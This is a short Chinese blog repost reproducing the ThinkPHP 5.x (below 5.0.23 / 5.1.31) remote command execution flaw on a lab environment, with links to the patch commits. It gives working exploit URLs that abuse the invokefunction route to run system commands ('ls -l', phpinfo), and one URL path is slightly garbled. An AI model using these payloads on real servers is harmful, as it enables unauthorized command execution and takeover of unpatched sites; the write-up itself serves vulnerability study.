漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)相关的知识,希望对你有一定的参考价值。
0x00复现环境
ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell)
0x01步骤
-
点击
start to hack
进入环境页面 run the project 然后访问给出的target address
1.执行系统命令显示目录下文件 http://aaa.vsplate.me:52763/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l - 执行phpinfo
http://aaa.vsplate.me/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20‘phpinfo();‘
想你所想,发挥创意
0x02漏洞原理分析
待分析
0x03漏洞分析
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815
reference
以上是关于漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)的主要内容,如果未能解决你的问题,请参考以下文章
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现